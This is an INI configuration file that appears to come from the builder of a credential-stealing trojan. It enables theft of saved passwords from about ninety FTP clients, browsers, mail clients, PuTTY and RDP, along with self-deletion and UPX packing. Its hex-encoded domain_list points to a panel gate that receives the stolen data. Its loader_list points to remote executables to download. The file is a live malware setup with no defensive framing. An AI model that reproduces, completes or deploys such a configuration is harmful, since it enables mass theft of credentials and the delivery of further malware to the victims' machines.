[main]
PackCheckBox=0
EncryptCheckBox=0
SaveReportCheckBox=0
PasswordEdit=TrojanForge.com
DebugModeCheckBox=0
SendModifiedCheckBox=0
SelfDeleteCheckBox=1
AddIconCheckBox=0
UPXCheckBox=1
SendEmptyReportsCheckBox=0
ShowAdvancedOptionsMenuItem=1
ActivateLoaderCheckBox=0
LoaderDupeCheckbox=0
SkinName=Opus (internal)
Width=575
Height=508
TabIndex=0
ExeModeCheckBox=1
DllModeCheckBox=0
CollectHTTPPasswordsCheckBox=1
CollectEmailPasswordsCheckBox=1
UploadRetriesEdit=2
domain_list=687474703A2F2F6661746675636B65722E77656234342E6E65742F50616E656C2F676174652E706870
loader_list=687474703A2F2F6D616769632D736B69642E636F6D2F736869742E6578650D0A687474703A2F2F736B69642E636F6D2F63616C63756C61746F722E657865
[ftp_clients]
MODULE_32BITFTP=1
MODULE_3DFTP=1
MODULE_ACEFTP=1
MODULE_ALFTP=1
MODULE_BECKY=1
MODULE_BITKINEX=0
MODULE_BLAZEFTP=1
MODULE_BROMIUM=1
MODULE_BULLETPROOF=1
MODULE_CERT=1
MODULE_CHROMEPLUS=1
MODULE_CHROMIUM=1
MODULE_CLASSICFTP=1
MODULE_COFFEECUPFTP=1
MODULE_VS_DESIGNER=1
MODULE_COMODODRAGON=1
MODULE_COOLNOVO=1
MODULE_COREFTP=1
MODULE_CUTEFTP=1
MODULE_CYBERDUCK=1
MODULE_DELUXEFTP=1
MODULE_DIRECTORYOPUS=1
MODULE_DREAMWEAVER=1
MODULE_EASYFTP=1
MODULE_EPIC=1
MODULE_EXPANDRIVE=1
MODULE_FAR=1
MODULE_FS_BROWSER=1
MODULE_FASTTRACK=1
MODULE_FFFTP=1
MODULE_FILEZILLA=1
MODULE_FIREFOX=1
MODULE_FIREFTP=1
MODULE_FLASHFXP=1
MODULE_FLING=1
MODULE_FLOCK=1
MODULE_FREEFTP=1
MODULE_FRESHFTP=1
MODULE_FRIGATEFTP=1
MODULE_FTPCOMMANDER=1
MODULE_FTPCONTROL=1
MODULE_FTPEXPLORER=1
MODULE_FTPNOW=1
MODULE_FTP_SURFER=1
MODULE_FTPVOYAGER=1
MODULE_FTPGETTER=1
MODULE_FTPINFO=1
MODULE_FTPRUSH=1
MODULE_FTPSHELL=1
MODULE_GLOBALDOWNLOADER=1
MODULE_GOFTP=1
MODULE_CHROME=1
MODULE_INCREDIMAIL=1
MODULE_IE=1
MODULE_KMELEON=1
MODULE_LEAPFTP=1
MODULE_LEECHFTP=1
MODULE_LINASFTP=1
MODULE_MOZILLA=1
MODULE_MYFTP=1
MODULE_NETDRIVE=1
MODULE_NETFILE=1
MODULE_NEXUSFILE=1
MODULE_NICHROME=1
MODULE_NOTEPADPP=1
MODULE_NOVAFTP=1
MODULE_ODIN=1
MODULE_OPERA=1
MODULE_OUTLOOK=1
MODULE_POCOMAIL=1
MODULE_PUTTY=1
MODULE_RDP=1
MODULE_ROBOFTP=1
MODULE_ROCKMELT=1
MODULE_SEAMONKEY=1
MODULE_SECUREFX=1
MODULE_SHERRODFTP=1
MODULE_SMARTFTP=1
MODULE_SOFTX=1
MODULE_STAFF=1
MODULE_THEBAT=1
MODULE_THUNDERBIRD=1
MODULE_WTC=1
MODULE_TURBOFTP=1
MODULE_ULTRAFXP=1
MODULE_WEBDRIVE=1
MODULE_WEBSITEPUBLISHER=1
MODULE_WINDOWS_LIVE_MAIL=1
MODULE_WINDOWS_MAIL=1
MODULE_WINFTP=1
MODULE_WINSCP=1
MODULE_WINZIP=1
MODULE_WISEFTP=1
MODULE_WS_FTP=1
MODULE_XFTP=1
MODULE_YANDEXINTERNET=1
